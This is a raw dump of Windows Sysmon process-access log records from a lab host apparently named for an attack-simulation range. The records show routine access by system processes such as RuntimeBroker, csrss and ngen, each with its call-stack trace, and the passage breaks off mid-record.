14:58:36.872{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC1C-607E-820E-00000000BB01}6512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080310Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.857{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1C-607E-820E-00000000BB01}6512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080309Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.794{A7A01FEF-C0A6-607E-7705-00000000BB01}43481436C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000080308Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.794{A7A01FEF-C0A6-607E-7705-00000000BB01}43481436C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000080307Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.794{A7A01FEF-C0A6-607E-7705-00000000BB01}43486372C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000080306Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.794{A7A01FEF-C0A6-607E-7705-00000000BB01}43486372C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000080305Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.794{A7A01FEF-C0A6-607E-7705-00000000BB01}43481196C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+ae6fa|C:\Windows\System32\combase.dll+a54bd|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+64de3|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7 10341000x800000000000000080304Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.700{A7A01FEF-C0A6-607E-7705-00000000BB01}43481436C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000080303Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.700{A7A01FEF-C0A6-607E-7705-00000000BB01}43481436C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000080302Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.700{A7A01FEF-C0A6-607E-7705-00000000BB01}43484104C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+ae6fa|C:\Windows\System32\combase.dll+a54bd|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+64de3|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7 10341000x800000000000000080301Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.700{A7A01FEF-C0A6-607E-7705-00000000BB01}43481436C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000080300Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.700{A7A01FEF-C0A6-607E-7705-00000000BB01}43484820C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000080299Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.700{A7A01FEF-C0A6-607E-7705-00000000BB01}43481436C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000080298Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.700{A7A01FEF-C0A6-607E-7705-00000000BB01}43484820C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000080297Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.700{A7A01FEF-C0A6-607E-7705-00000000BB01}43484284C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+ae6fa|C:\Windows\System32\combase.dll+a54bd|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+64de3|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7 10341000x800000000000000080296Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.700{A7A01FEF-C0A6-607E-7705-00000000BB01}43484820C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000080295Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.700{A7A01FEF-C0A6-607E-7705-00000000BB01}43484820C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000080294Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.700{A7A01FEF-C0A6-607E-7705-00000000BB01}43481436C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000080293Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.700{A7A01FEF-C0A6-607E-7705-00000000BB01}43481436C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000080292Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.700{A7A01FEF-C0A6-607E-7705-00000000BB01}43484820C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5